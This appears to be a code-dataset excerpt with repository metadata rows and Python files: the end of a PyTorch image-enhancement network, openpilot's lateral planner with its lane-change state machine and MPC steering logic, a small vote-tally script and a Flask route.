x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv1.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = torch.cat([x, conv1_fuse], dim=1)
del conv1
x = self.dconv_up1(x)
x = x+x_in_tile
out = self.conv_last(x)
return out
class LocalNet(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1(self.refpad(x_in)))
x = self.lrelu(self.conv2(self.refpad(x)))
return x
def __init__(self, in_channels=16, out_channels=64):
super(LocalNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, 0, 1)
self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 0, 1)
self.lrelu = nn.LeakyReLU()
self.refpad = nn.ReflectionPad2d(1)
class MidNet2(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
super(MidNet2, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 2, 2)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 2, 2)
class MidNet4(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
super(MidNet4, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 4, 4)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 4, 4)
class SimpleUpsampler(nn.Sequential):
def __init__(self, scale):
m = []
m.append(nn.PixelShuffle(scale))
super(SimpleUpsampler, self).__init__(*m)
def DownSamplingShuffle(x):
[N, C, W, H] = x.shape
x1 = x[:, :, 0:W:2, 0:H:2]
x2 = x[:, :, 0:W:2, 1:H:2]
x3 = x[:, :, 1:W:2, 0:H:2]
x4 = x[:, :, 1:W:2, 1:H:2]
return torch.cat((x1, x2, x3, x4), 1)
class TEDModel(nn.Module):
def __init__(self):
super(TEDModel, self).__init__()
self.ted = TED()
self.final_conv = nn.Conv2d(16, 64, 3, 1, 0, 1)
self.refpad = nn.ReflectionPad2d(1)
def forward(self, image):
image_shuffled = DownSamplingShuffle(image)
output_image = self.ted(image_shuffled.float())
upsampler = SimpleUpsampler(2)
upsampler = nn.Sequential(*upsampler)
output_image = upsampler(output_image)
return self.final_conv(self.refpad(output_image))
| true | true |
1c3ca89898254300ae55bd6dd429dc7076b83741 | 11,070 | py | Python | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | 1 | 2021-08-15T18:21:45.000Z | 2021-08-15T18:21:45.000Z | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | 6 | 2021-06-25T04:56:29.000Z | 2022-01-11T00:37:15.000Z | import os
import math
import numpy as np
from common.realtime import sec_since_boot, DT_MDL
from common.numpy_fast import interp
from selfdrive.swaglog import cloudlog
from selfdrive.controls.lib.lateral_mpc import libmpc_py
from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, CAR_ROTATION_RADIUS
from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE
from selfdrive.config import Conversions as CV
import cereal.messaging as messaging
from cereal import log
# Short aliases for the capnp lane-change enums.
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection

# When set in the environment, publish the raw MPC solution on 'liveMpc'.
LOG_MPC = os.environ.get('LOG_MPC', False)

# Lane changes may only be initiated above this speed (30 mph in m/s).
LANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS
# A lane change still in progress after this many seconds is aborted.
LANE_CHANGE_TIME_MAX = 10.

# Maps (lane change direction, lane change state) to the Desire that is
# published on lateralPlan; only the 'laneChangeStarting/Finishing' states
# of an active direction produce a non-none desire.
DESIRES = {
  LaneChangeDirection.none: {
    LaneChangeState.off: log.LateralPlan.Desire.none,
    LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
    LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,
    LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,
  },
  LaneChangeDirection.left: {
    LaneChangeState.off: log.LateralPlan.Desire.none,
    LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
    LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,
    LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,
  },
  LaneChangeDirection.right: {
    LaneChangeState.off: log.LateralPlan.Desire.none,
    LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
    LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,
    LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,
  },
}
class LateralPlanner():
  """Plans the vehicle's lateral (steering) trajectory.

  Each step parses the driving model's predicted path/lane lines, runs the
  lane change state machine, and solves the lateral MPC to produce a
  curvature plan that is published as 'lateralPlan'.
  """

  def __init__(self, CP, use_lanelines=True, wide_camera=False):
    """Initialise planner state and the lateral MPC.

    :param CP: car parameters (provides steerRateCost)
    :param use_lanelines: plan on lane lines if True, else on the model path
    :param wide_camera: passed through to LanePlanner
    """
    self.use_lanelines = use_lanelines
    self.LP = LanePlanner(wide_camera)

    self.last_cloudlog_t = 0
    self.steer_rate_cost = CP.steerRateCost
    self.setup_mpc()
    self.solution_invalid_cnt = 0

    # Lane change state machine bookkeeping.
    self.lane_change_state = LaneChangeState.off
    self.lane_change_direction = LaneChangeDirection.none
    self.lane_change_timer = 0.0
    self.lane_change_ll_prob = 1.0
    self.keep_pulse_timer = 0.0
    self.prev_one_blinker = False
    self.desire = log.LateralPlan.Desire.none

    # Model outputs, refreshed in update() when a full trajectory arrives.
    self.path_xyz = np.zeros((TRAJECTORY_SIZE,3))
    self.path_xyz_stds = np.ones((TRAJECTORY_SIZE,3))
    self.plan_yaw = np.zeros((TRAJECTORY_SIZE,))
    self.t_idxs = np.arange(TRAJECTORY_SIZE)
    self.y_pts = np.zeros(TRAJECTORY_SIZE)

  def setup_mpc(self):
    """Create the MPC solver handles and zero the solver state."""
    self.libmpc = libmpc_py.libmpc
    self.libmpc.init()

    self.mpc_solution = libmpc_py.ffi.new("log_t *")
    self.cur_state = libmpc_py.ffi.new("state_t *")
    self.cur_state[0].x = 0.0
    self.cur_state[0].y = 0.0
    self.cur_state[0].psi = 0.0
    self.cur_state[0].curvature = 0.0

    self.desired_curvature = 0.0
    self.safe_desired_curvature = 0.0
    self.desired_curvature_rate = 0.0
    self.safe_desired_curvature_rate = 0.0

  def update(self, sm, CP):
    """Run one planner step.

    Reads carState/controlsState/modelV2 from `sm`, advances the lane change
    state machine, selects the target path, and runs the lateral MPC.

    :param sm: SubMaster with 'carState', 'controlsState' and 'modelV2'
    :param CP: car parameters (provides steerRateCost)
    """
    v_ego = sm['carState'].vEgo
    active = sm['controlsState'].active
    measured_curvature = sm['controlsState'].curvature

    md = sm['modelV2']
    self.LP.parse_model(sm['modelV2'])
    # Only accept the model trajectory when it is complete.
    if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE:
      self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z])
      self.t_idxs = np.array(md.position.t)
      self.plan_yaw = list(md.orientation.z)
    if len(md.orientation.xStd) == TRAJECTORY_SIZE:
      self.path_xyz_stds = np.column_stack([md.position.xStd, md.position.yStd, md.position.zStd])

    # Lane change logic
    one_blinker = sm['carState'].leftBlinker != sm['carState'].rightBlinker
    below_lane_change_speed = v_ego < LANE_CHANGE_SPEED_MIN

    if (not active) or (self.lane_change_timer > LANE_CHANGE_TIME_MAX):
      self.lane_change_state = LaneChangeState.off
      self.lane_change_direction = LaneChangeDirection.none
    else:
      # LaneChangeState.off
      if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:
        self.lane_change_state = LaneChangeState.preLaneChange
        self.lane_change_ll_prob = 1.0

      # LaneChangeState.preLaneChange
      elif self.lane_change_state == LaneChangeState.preLaneChange:
        # Set lane change direction
        if sm['carState'].leftBlinker:
          self.lane_change_direction = LaneChangeDirection.left
        elif sm['carState'].rightBlinker:
          self.lane_change_direction = LaneChangeDirection.right
        else:  # If there are no blinkers we will go back to LaneChangeState.off
          self.lane_change_direction = LaneChangeDirection.none

        # The driver must nudge the wheel towards the target lane to confirm.
        torque_applied = sm['carState'].steeringPressed and \
                         ((sm['carState'].steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or
                          (sm['carState'].steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))

        blindspot_detected = ((sm['carState'].leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or
                              (sm['carState'].rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))

        if not one_blinker or below_lane_change_speed:
          self.lane_change_state = LaneChangeState.off
        elif torque_applied and not blindspot_detected:
          self.lane_change_state = LaneChangeState.laneChangeStarting

      # LaneChangeState.laneChangeStarting
      elif self.lane_change_state == LaneChangeState.laneChangeStarting:
        # fade out over .5s
        self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2*DT_MDL, 0.0)
        # 98% certainty
        lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob
        if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:
          self.lane_change_state = LaneChangeState.laneChangeFinishing

      # LaneChangeState.laneChangeFinishing
      elif self.lane_change_state == LaneChangeState.laneChangeFinishing:
        # fade in laneline over 1s
        self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)
        if one_blinker and self.lane_change_ll_prob > 0.99:
          self.lane_change_state = LaneChangeState.preLaneChange
        elif self.lane_change_ll_prob > 0.99:
          self.lane_change_state = LaneChangeState.off

    if self.lane_change_state in [LaneChangeState.off, LaneChangeState.preLaneChange]:
      self.lane_change_timer = 0.0
    else:
      self.lane_change_timer += DT_MDL

    self.prev_one_blinker = one_blinker

    self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]

    # Send keep pulse once per second during LaneChangeStart.preLaneChange
    if self.lane_change_state in [LaneChangeState.off, LaneChangeState.laneChangeStarting]:
      self.keep_pulse_timer = 0.0
    elif self.lane_change_state == LaneChangeState.preLaneChange:
      self.keep_pulse_timer += DT_MDL
      if self.keep_pulse_timer > 1.0:
        self.keep_pulse_timer = 0.0
      elif self.desire in [log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight]:
        self.desire = log.LateralPlan.Desire.none

    # Turn off lanes during lane change
    if self.desire == log.LateralPlan.Desire.laneChangeRight or self.desire == log.LateralPlan.Desire.laneChangeLeft:
      self.LP.lll_prob *= self.lane_change_ll_prob
      self.LP.rll_prob *= self.lane_change_ll_prob
    if self.use_lanelines:
      d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz)
      self.libmpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, CP.steerRateCost)
    else:
      d_path_xyz = self.path_xyz
      # Scale path cost by confidence in the lateral model prediction.
      path_cost = np.clip(abs(self.path_xyz[0,1]/self.path_xyz_stds[0,1]), 0.5, 5.0) * MPC_COST_LAT.PATH
      # Heading cost is useful at low speed, otherwise end of plan can be off-heading
      heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.0])
      self.libmpc.set_weights(path_cost, heading_cost, CP.steerRateCost)

    # Resample the spatial plan to the MPC's time grid at the current speed.
    y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(d_path_xyz, axis=1), d_path_xyz[:,1])
    heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw)
    self.y_pts = y_pts

    assert len(y_pts) == LAT_MPC_N + 1
    assert len(heading_pts) == LAT_MPC_N + 1
    # for now CAR_ROTATION_RADIUS is disabled
    # to use it, enable it in the MPC
    assert abs(CAR_ROTATION_RADIUS) < 1e-3
    self.libmpc.run_mpc(self.cur_state, self.mpc_solution,
                        float(v_ego),
                        CAR_ROTATION_RADIUS,
                        list(y_pts),
                        list(heading_pts))

    # init state for next iteration; curvature is seeded from the solution
    # one model step (DT_MDL) ahead.
    self.cur_state.x = 0.0
    self.cur_state.y = 0.0
    self.cur_state.psi = 0.0
    self.cur_state.curvature = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.mpc_solution.curvature)

    # Check for infeasible MPC solution
    mpc_nans = any(math.isnan(x) for x in self.mpc_solution.curvature)
    t = sec_since_boot()
    if mpc_nans:
      # Reset the solver and fall back to the measured curvature.
      self.libmpc.init()
      self.cur_state.curvature = measured_curvature

      if t > self.last_cloudlog_t + 5.0:
        self.last_cloudlog_t = t
        cloudlog.warning("Lateral mpc - nan: True")

    if self.mpc_solution[0].cost > 20000. or mpc_nans:   # TODO: find a better way to detect when MPC did not converge
      self.solution_invalid_cnt += 1
    else:
      self.solution_invalid_cnt = 0

  def publish(self, sm, pm):
    """Publish the 'lateralPlan' message (and 'liveMpc' when LOG_MPC is set).

    :param sm: SubMaster used to check liveness/validity of the inputs
    :param pm: PubMaster used to send the messages
    """
    # Two consecutive invalid solutions invalidate the plan.
    plan_solution_valid = self.solution_invalid_cnt < 2
    plan_send = messaging.new_message('lateralPlan')
    plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'modelV2'])
    plan_send.lateralPlan.laneWidth = float(self.LP.lane_width)
    plan_send.lateralPlan.dPathPoints = [float(x) for x in self.y_pts]
    plan_send.lateralPlan.psis = [float(x) for x in self.mpc_solution.psi[0:CONTROL_N]]
    plan_send.lateralPlan.curvatures = [float(x) for x in self.mpc_solution.curvature[0:CONTROL_N]]
    plan_send.lateralPlan.curvatureRates = [float(x) for x in self.mpc_solution.curvature_rate[0:CONTROL_N-1]] +[0.0]
    plan_send.lateralPlan.lProb = float(self.LP.lll_prob)
    plan_send.lateralPlan.rProb = float(self.LP.rll_prob)
    plan_send.lateralPlan.dProb = float(self.LP.d_prob)

    plan_send.lateralPlan.mpcSolutionValid = bool(plan_solution_valid)

    plan_send.lateralPlan.desire = self.desire
    plan_send.lateralPlan.laneChangeState = self.lane_change_state
    plan_send.lateralPlan.laneChangeDirection = self.lane_change_direction

    pm.send('lateralPlan', plan_send)

    if LOG_MPC:
      dat = messaging.new_message('liveMpc')
      dat.liveMpc.x = list(self.mpc_solution.x)
      dat.liveMpc.y = list(self.mpc_solution.y)
      dat.liveMpc.psi = list(self.mpc_solution.psi)
      dat.liveMpc.curvature = list(self.mpc_solution.curvature)
      dat.liveMpc.cost = self.mpc_solution.cost
      pm.send('liveMpc', dat)
| 44.457831 | 133 | 0.725474 | import os
import math
import numpy as np
from common.realtime import sec_since_boot, DT_MDL
from common.numpy_fast import interp
from selfdrive.swaglog import cloudlog
from selfdrive.controls.lib.lateral_mpc import libmpc_py
from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, CAR_ROTATION_RADIUS
from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE
from selfdrive.config import Conversions as CV
import cereal.messaging as messaging
from cereal import log
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection
LOG_MPC = os.environ.get('LOG_MPC', False)
LANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS
LANE_CHANGE_TIME_MAX = 10.
DESIRES = {
LaneChangeDirection.none: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,
},
LaneChangeDirection.left: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,
},
LaneChangeDirection.right: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,
},
}
class LateralPlanner():
  """Lateral (steering) planner.

  Each cycle it: (1) ingests the vision model's predicted path, (2) advances a
  blinker/torque-driven lane-change state machine, (3) runs the lateral MPC on
  the desired path, and (4) publishes the resulting plan via `publish()`.
  """
  def __init__(self, CP, use_lanelines=True, wide_camera=False):
    """CP: car params (only `steerRateCost` is read here).
    use_lanelines: follow the lane-line-derived path instead of the raw model path.
    wide_camera: forwarded to LanePlanner.
    """
    self.use_lanelines = use_lanelines
    self.LP = LanePlanner(wide_camera)
    self.last_cloudlog_t = 0
    self.steer_rate_cost = CP.steerRateCost
    self.setup_mpc()
    # Counts consecutive invalid MPC solutions; publish() declares the plan
    # invalid once this reaches 2.
    self.solution_invalid_cnt = 0
    # Lane-change state machine state.
    self.lane_change_state = LaneChangeState.off
    self.lane_change_direction = LaneChangeDirection.none
    self.lane_change_timer = 0.0
    # Blend factor for lane-line probabilities during a lane change (1.0 = full trust).
    self.lane_change_ll_prob = 1.0
    self.keep_pulse_timer = 0.0
    self.prev_one_blinker = False
    self.desire = log.LateralPlan.Desire.none
    # Model path buffers, refreshed in update() when the model output is full-length.
    self.path_xyz = np.zeros((TRAJECTORY_SIZE,3))
    self.path_xyz_stds = np.ones((TRAJECTORY_SIZE,3))
    self.plan_yaw = np.zeros((TRAJECTORY_SIZE,))
    self.t_idxs = np.arange(TRAJECTORY_SIZE)
    self.y_pts = np.zeros(TRAJECTORY_SIZE)
  def setup_mpc(self):
    """Initialize the lateral MPC library and zero its state/solution structs."""
    self.libmpc = libmpc_py.libmpc
    self.libmpc.init()
    self.mpc_solution = libmpc_py.ffi.new("log_t *")
    self.cur_state = libmpc_py.ffi.new("state_t *")
    self.cur_state[0].x = 0.0
    self.cur_state[0].y = 0.0
    self.cur_state[0].psi = 0.0
    self.cur_state[0].curvature = 0.0
    self.desired_curvature = 0.0
    self.safe_desired_curvature = 0.0
    self.desired_curvature_rate = 0.0
    self.safe_desired_curvature_rate = 0.0
  def update(self, sm, CP):
    """Run one planner step from the SubMaster `sm` ('carState',
    'controlsState', 'modelV2' must be present)."""
    v_ego = sm['carState'].vEgo
    active = sm['controlsState'].active
    measured_curvature = sm['controlsState'].curvature
    # Parse model predictions; only accept full-length trajectories.
    md = sm['modelV2']
    self.LP.parse_model(sm['modelV2'])
    if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE:
      self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z])
      self.t_idxs = np.array(md.position.t)
      self.plan_yaw = list(md.orientation.z)
    if len(md.orientation.xStd) == TRAJECTORY_SIZE:
      self.path_xyz_stds = np.column_stack([md.position.xStd, md.position.yStd, md.position.zStd])
    # Lane change logic. Exactly one blinker must be on to arm a lane change.
    one_blinker = sm['carState'].leftBlinker != sm['carState'].rightBlinker
    below_lane_change_speed = v_ego < LANE_CHANGE_SPEED_MIN
    if (not active) or (self.lane_change_timer > LANE_CHANGE_TIME_MAX):
      # Disengaged or lane change took too long: abort to off.
      self.lane_change_state = LaneChangeState.off
      self.lane_change_direction = LaneChangeDirection.none
    else:
      # off -> preLaneChange on a fresh blinker press at sufficient speed.
      if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:
        self.lane_change_state = LaneChangeState.preLaneChange
        self.lane_change_ll_prob = 1.0
      # preLaneChange: wait for driver torque toward the blinker side.
      elif self.lane_change_state == LaneChangeState.preLaneChange:
        if sm['carState'].leftBlinker:
          self.lane_change_direction = LaneChangeDirection.left
        elif sm['carState'].rightBlinker:
          self.lane_change_direction = LaneChangeDirection.right
        else:
          self.lane_change_direction = LaneChangeDirection.none
        # Steering torque sign convention: positive = left (inferred from the
        # pairing below) -- TODO confirm against carState definition.
        torque_applied = sm['carState'].steeringPressed and \
                         ((sm['carState'].steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or
                          (sm['carState'].steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))
        blindspot_detected = ((sm['carState'].leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or
                              (sm['carState'].rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))
        if not one_blinker or below_lane_change_speed:
          self.lane_change_state = LaneChangeState.off
        elif torque_applied and not blindspot_detected:
          self.lane_change_state = LaneChangeState.laneChangeStarting
      # laneChangeStarting: fade out lane-line confidence; finish once the
      # model reports the lane change is essentially done.
      elif self.lane_change_state == LaneChangeState.laneChangeStarting:
        self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2*DT_MDL, 0.0)
        lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob
        if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:
          self.lane_change_state = LaneChangeState.laneChangeFinishing
      # laneChangeFinishing: fade lane-line confidence back in, then either
      # re-arm (blinker still on) or return to off.
      elif self.lane_change_state == LaneChangeState.laneChangeFinishing:
        self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)
        if one_blinker and self.lane_change_ll_prob > 0.99:
          self.lane_change_state = LaneChangeState.preLaneChange
        elif self.lane_change_ll_prob > 0.99:
          self.lane_change_state = LaneChangeState.off
    # Timer only runs while a lane change is actually in progress.
    if self.lane_change_state in [LaneChangeState.off, LaneChangeState.preLaneChange]:
      self.lane_change_timer = 0.0
    else:
      self.lane_change_timer += DT_MDL
    self.prev_one_blinker = one_blinker
    self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]
    # Send keep-pulse: while pre-arming, periodically suppress keepLeft/keepRight
    # so the desire is pulsed rather than held (timer wraps at 1.0s).
    if self.lane_change_state in [LaneChangeState.off, LaneChangeState.laneChangeStarting]:
      self.keep_pulse_timer = 0.0
    elif self.lane_change_state == LaneChangeState.preLaneChange:
      self.keep_pulse_timer += DT_MDL
      if self.keep_pulse_timer > 1.0:
        self.keep_pulse_timer = 0.0
      elif self.desire in [log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight]:
        self.desire = log.LateralPlan.Desire.none
    # Turn off lanes during lane change
    if self.desire == log.LateralPlan.Desire.laneChangeRight or self.desire == log.LateralPlan.Desire.laneChangeLeft:
      self.LP.lll_prob *= self.lane_change_ll_prob
      self.LP.rll_prob *= self.lane_change_ll_prob
    if self.use_lanelines:
      d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz)
      self.libmpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, CP.steerRateCost)
    else:
      # Laneless mode: weight the path cost by how confident the model is in
      # its lateral position (clipped), and fade the heading cost out with speed.
      d_path_xyz = self.path_xyz
      path_cost = np.clip(abs(self.path_xyz[0,1]/self.path_xyz_stds[0,1]), 0.5, 5.0) * MPC_COST_LAT.PATH
      heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.0])
      self.libmpc.set_weights(path_cost, heading_cost, CP.steerRateCost)
    # Resample path/heading from distance-along-path to the MPC time grid.
    y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(d_path_xyz, axis=1), d_path_xyz[:,1])
    heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw)
    self.y_pts = y_pts
    assert len(y_pts) == LAT_MPC_N + 1
    assert len(heading_pts) == LAT_MPC_N + 1
    assert abs(CAR_ROTATION_RADIUS) < 1e-3
    self.libmpc.run_mpc(self.cur_state, self.mpc_solution,
                        float(v_ego),
                        CAR_ROTATION_RADIUS,
                        list(y_pts),
                        list(heading_pts))
    # Reset the ego frame for the next solve; seed curvature from this solution.
    self.cur_state.x = 0.0
    self.cur_state.y = 0.0
    self.cur_state.psi = 0.0
    self.cur_state.curvature = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.mpc_solution.curvature)
    # Check for infeasible MPC solution
    mpc_nans = any(math.isnan(x) for x in self.mpc_solution.curvature)
    t = sec_since_boot()
    if mpc_nans:
      # Reinitialize the solver and fall back to measured curvature; rate-limit
      # the warning to once per 5s.
      self.libmpc.init()
      self.cur_state.curvature = measured_curvature
      if t > self.last_cloudlog_t + 5.0:
        self.last_cloudlog_t = t
        cloudlog.warning("Lateral mpc - nan: True")
    if self.mpc_solution[0].cost > 20000. or mpc_nans:
      self.solution_invalid_cnt += 1
    else:
      self.solution_invalid_cnt = 0
  def publish(self, sm, pm):
    """Publish 'lateralPlan' (and optionally 'liveMpc') on PubMaster `pm`."""
    # Two consecutive bad solutions mark the plan invalid.
    plan_solution_valid = self.solution_invalid_cnt < 2
    plan_send = messaging.new_message('lateralPlan')
    plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'modelV2'])
    plan_send.lateralPlan.laneWidth = float(self.LP.lane_width)
    plan_send.lateralPlan.dPathPoints = [float(x) for x in self.y_pts]
    plan_send.lateralPlan.psis = [float(x) for x in self.mpc_solution.psi[0:CONTROL_N]]
    plan_send.lateralPlan.curvatures = [float(x) for x in self.mpc_solution.curvature[0:CONTROL_N]]
    # curvature_rate has one fewer sample than curvature; pad the tail with 0.
    plan_send.lateralPlan.curvatureRates = [float(x) for x in self.mpc_solution.curvature_rate[0:CONTROL_N-1]] +[0.0]
    plan_send.lateralPlan.lProb = float(self.LP.lll_prob)
    plan_send.lateralPlan.rProb = float(self.LP.rll_prob)
    plan_send.lateralPlan.dProb = float(self.LP.d_prob)
    plan_send.lateralPlan.mpcSolutionValid = bool(plan_solution_valid)
    plan_send.lateralPlan.desire = self.desire
    plan_send.lateralPlan.laneChangeState = self.lane_change_state
    plan_send.lateralPlan.laneChangeDirection = self.lane_change_direction
    pm.send('lateralPlan', plan_send)
    if LOG_MPC:
      dat = messaging.new_message('liveMpc')
      dat.liveMpc.x = list(self.mpc_solution.x)
      dat.liveMpc.y = list(self.mpc_solution.y)
      dat.liveMpc.psi = list(self.mpc_solution.psi)
      dat.liveMpc.curvature = list(self.mpc_solution.curvature)
      dat.liveMpc.cost = self.mpc_solution.cost
      pm.send('liveMpc', dat)
| true | true |
1c3ca96a8752bea73f340ee28894ea1bdab8af22 | 215 | py | Python | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | 1 | 2021-06-11T08:55:03.000Z | 2021-06-11T08:55:03.000Z | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | null | null | null | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | null | null | null | import funcvote as vote
# Read the raw ballot string from the user (the prompt is Korean: "vote content >>>").
votes = input("투표내용 >>>")
# Convert the raw input into vote values -- presumably one int per ballot
# character/token (see funcvote.str2int) -- TODO confirm against funcvote.
result = vote.str2int(votes)
print(vote.countvotes(result))
# Tally the votes and pretty-print the result.
result = vote.countvotes(result)
vote.printvote(result)
# 투표 초안 | 14.333333 | 32 | 0.716279 | import funcvote as vote
votes = input("투표내용 >>>")
result = vote.str2int(votes)
print(vote.countvotes(result))
result = vote.countvotes(result)
vote.printvote(result)
| true | true |
1c3ca9e71817ee5fcb844a158df98afd6ab0e6c3 | 287 | py | Python | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from flask import render_template
from ...main import main
@main.route('/digital-services/framework')
def framework_digital_services():
    """Render the Digital Services framework content page."""
    template_name = 'content/framework-digital-services.html'
    return render_template(template_name)
| 22.076923 | 49 | 0.738676 |
from __future__ import unicode_literals
from flask import render_template
from ...main import main
@main.route('/digital-services/framework')
def framework_digital_services():
return render_template(
'content/framework-digital-services.html'
)
| true | true |
1c3ca9fe0ba39643af17fbe0c380891ae5a61c42 | 723 | py | Python | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
